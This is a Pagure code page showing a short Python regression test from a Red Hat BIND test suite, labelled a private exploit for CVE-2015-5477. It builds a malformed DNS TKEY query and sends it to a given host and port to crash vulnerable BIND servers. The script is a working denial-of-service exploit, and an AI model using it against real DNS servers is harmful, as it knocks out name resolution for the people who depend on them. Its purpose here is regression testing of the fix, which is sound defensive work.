tests / bind

Clone
Source Code
GIT

Files

  1.   c068eec327c6b232d6c5bc836176fb0006d78adc
  2.   Regression
  3.   bz1247374-bind-TKEY-query-handling-flaw-leading-to-denial
  4.   CVE-2015-5477.py
Blob Blame History Raw 
#!/usr/bin/python

# usage: python CVE-2015-5477.py 127.0.0.1 53
#
# An affected BIND version will crash with a message like:
# Jul 27 22:17:28 localhost named[1746]: message.c:2311: REQUIRE(*name == ((void *)0)) failed, back trace
#
# Florian Weimer / Red Hat Product Security
#  
# PRIVATE EXPLOT -- DO NOT SHARE

import dns.message
import dns.name
import dns.rdtypes.IN.A
import dns.rrset
import sys
import socket
from dns.rdataclass import IN

target, port = sys.argv[1:]
port = int(port)

invalid = dns.name.from_text("invalid.")

additional = dns.rrset.RRset(invalid, IN, dns.rdatatype.A)
additional.add(dns.rdtypes.IN.A.A(IN, dns.rdatatype.A, "192.0.2.1"))

msg = dns.message.Message()
msg.question.append(dns.rrset.RRset(invalid, IN, dns.rdatatype.TKEY))
msg.additional.append(additional)
print(msg.to_text())
blob = msg.to_wire()
print(repr(blob))

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
sock.sendto(blob, (target, port))
Powered by Pagure 5.13.3
DocumentationFile an IssueAbout this InstanceSSH Hostkey/Fingerprint
© Red Hat, Inc. and others.